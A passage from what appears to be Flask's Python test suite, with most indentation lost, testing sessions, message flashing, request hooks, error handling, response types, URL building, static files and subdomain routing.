expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash(u"Hello World")
flask.flash(u"Hello World", "error")
flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u"Hello World",
u"Hello World",
flask.Markup(u"<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", u"Hello World"),
("error", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", u"Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == u"Hello World"
assert messages[1] == flask.Markup(u"<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route('/dict')
def from_dict():
return {"foo": "bar"}, 201
assert client.get('/text').data == u'Hällo Wörld'.encode('utf-8')
assert client.get('/bytes').data == u'Hällo Wörld'.encode('utf-8')
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get('/dict')
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(",")
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ",".join(base_to_url(x) for x in value)
app.url_map.converters["list"] = ListConverter
@app.route("/<list:args>")
def index(args):
return "|".join(args)
assert client.get("/1,2,3").data == b"1|2|3"
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder='', static_url_path='')
rv = app.test_client().open('/static/index.html', method='GET')
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder='')
rv = app.test_client().open('/static/index.html', method='GET')
assert rv.status_code == 200
rv.close()
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__, subdomain_matching=True)
app.config.update(SERVER_NAME="localhost.localdomain:5000")
client = app.test_client()
@app.route("/")
def index():
return "Foo"
@app.route("/", subdomain="foo")
def subdomain():
return "Foo SubDomain"
rv = client.get("/")
assert rv.data == b"Foo"
rv = client.get("/", "http://localhost.localdomain:5000")
assert rv.data == b"Foo"
rv = client.get("/", "https://localhost.localdomain:5000")
assert rv.data == b"Foo"
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "https://localhost.localdomain")
assert rv.data == b"Foo"
try:
app.config.update(SERVER_NAME="localhost.localdomain:443")
rv = client.get("/", "https://localhost.localdomain")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "http://foo.localhost")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = client.get("/", "http://foo.localhost.localdomain")
assert rv.data == b"Foo SubDomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens, the context is
# not torn down. That causes other tests that run after this one to
# fail when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
assert False
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
assert False
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
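    # url_value_preprocessor strips lang_code out of incoming URL values into
    # flask.g, and url_defaults injects it back into url_for() calls, so view
    # functions never handle the language prefix themselves.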
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
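    # The threaded request must block until the before_first_request hook
    # finishes, so both requests observe got == [42] exactly once.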
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
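    # In debug mode the implicit trailing-slash redirect on a POST raises an
    # AssertionError instead, because the redirected request would silently
    # drop its form data.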
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e)
assert ("Make sure to directly send " "your POST-request to this URL") in str(e)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
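    # In debug mode Flask preserves the context of a failing request so the
    # interactive debugger can inspect it; only the most recent one is kept.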
@app.route("/fail")
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
    assert rv.status_code == (404 if matching else 204)
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
    assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
